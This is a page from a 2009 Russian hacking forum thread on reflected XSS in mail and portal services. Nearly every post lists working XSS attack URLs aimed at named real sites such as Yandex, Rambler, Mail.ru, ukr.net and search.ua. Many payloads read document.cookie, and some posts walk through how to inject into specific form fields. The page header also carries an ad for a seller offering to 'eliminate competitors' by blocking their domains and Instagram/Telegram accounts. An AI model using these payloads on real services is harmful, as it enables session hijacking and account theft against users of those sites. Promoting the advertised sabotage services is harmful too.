Форум АНТИЧАТ - Пассивные xss на почтовых серверах

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Пассивные xss на почтовых серверах

Страница 11 из 15

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#101

02.12.2009, 18:19

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://search.icq.com/search/img_results.php?q=%27%3E%3C%27%27%3E%22%3E%3Cscrip t%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&ch_id=%27% 3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

Последний раз редактировалось Ruslan1817; 02.12.2009 в 23:22..

#102

02.12.2009, 23:28

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Продолжаем

Заходим сюды ---> Зарегистрироваться и разместить рекламу ----> вводим любые данные ----> выбераем что будем продавать ----> уязвимое поле " нофелет "
'><script>alert(/XSS/)</script>

#103

03.12.2009, 17:36

Root-access

Участник форума

Регистрация: 18.06.2008

Сообщений: 222

Провел на форуме:
2223440

Репутация: 648

Отправить сообщение для Root-access с помощью ICQ

Yandex XSS: http://mail.yandex.ru/classic/abook_person?ids=1\');'>');}</script><script>alert()</script>

Вот ещё кучка XSS, которые я где-то выкладывал, что-то уже нерабочее:

Код:

http://rutube.ru/search.html?search=sum41&sort_by=1"><script>alert( 'XSS')</script>&category=1

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script> 

http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script> 

http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script> 

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script> 

http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script> 

http://www.pisem.net/download.php/?file="><script>alert('XSS')</script> 

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> 

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://foto.rambler.ru/introduce.htm...)%3C/script%3E

http://uptime.ru/downtime.php?host_id="><script>alert()</script>"

http://www.speedguide.net/read_articles.php?id="><script>alert()</script>"

http://mail.yandex.ru/r?url=javascript:alert();

#104

05.12.2009, 12:52

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://testoteka.ukr.net/searchresults/?target=%2522%253cscript%253ealert%28document.cook ie%29%253c%2Fscript%253e

http://search.ukr.net/yandex/search.php?search_mode=ordinal&geo=11000187&Perfor mSearch=1&search_query=\%27%3E%3C\%27\%27%3E\%22%3 E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Последний раз редактировалось Ruslan1817; 05.12.2009 в 12:58..

#105

12.12.2009, 16:10

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3 Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

#106

19.12.2009, 18:51

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://finance.search.ua/?area='%3E%3C''%3E%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://tv.search.ua/?query=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%2 8document.cookie%29%3C%2Fscript%3E
http://tv.search.ua/?day='><''>"><script>alert(document.cookie)</script>

короче там все в XSS ))

http://r.mail.kz/wssx/helpinside.wssx?Language=russian'><''>"><script>al ert(/Ruslan1817/)</script>

http://r.mail.kz/wssx/helpinside.wssx
уязвимые поля :
Ваше Имя Фамилия:
Ваш e-mail:

http://top.mail.tj/index.aspx?page=1&o=hits&l=50'%3E%3C''%3E%22%3E%3C script%3Ealert(/XSS/)%3C/script%3E

Последний раз редактировалось Ruslan1817; 19.12.2009 в 19:25..

#107

21.12.2009, 22:02

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://foto.rambler.ru/introduce.html?back='%3E%3C''%3E%22%3E%3Cscript%3E alert(document.cookie)%3C/script%3E

http://planeta.rambler.ru/community/community/?tags=4049740'%3E%3C''%3E%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

Последний раз редактировалось Ruslan1817; 21.12.2009 в 22:27..

#108

23.12.2009, 01:18

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Заходим сюда --->http://rasp.yandex.ru/widgets/route?station_from=9623562&station_to=9600215&thre ad=YUT376A_agent&dateForward=2009-12-22

Видем внизу
Текст:
-«Вылетаю!»
-«Встречайте!»
-написать свой текст <---- он нам и нужен

Вставляем туда ---> <IMG SRC=" javascript:alert('XSS');"> ----> жмем получить код ---> потом выбераем любую из них «Вылетаю!» , «Встречайте!» и снова жмем обратно ( где скрипт ) и вот она долгожданная "XSS" ))

#109

23.12.2009, 22:14

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://travel.mail.ru/?mod=story&hotel_id=4334&'><''>"><script>alert(/Ruslan1817/)</script>

#110

26.12.2009, 15:40

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://afisha.mail.ru/resto_list.html?advs=1&name=&%22%3E%3Cimg%20src=fo o.png%20onerror=alert(document.cookie)%20/%3E

Страница 11 из 15

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Сценарии/CMF/СMS	7	04.02.2010 02:55
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход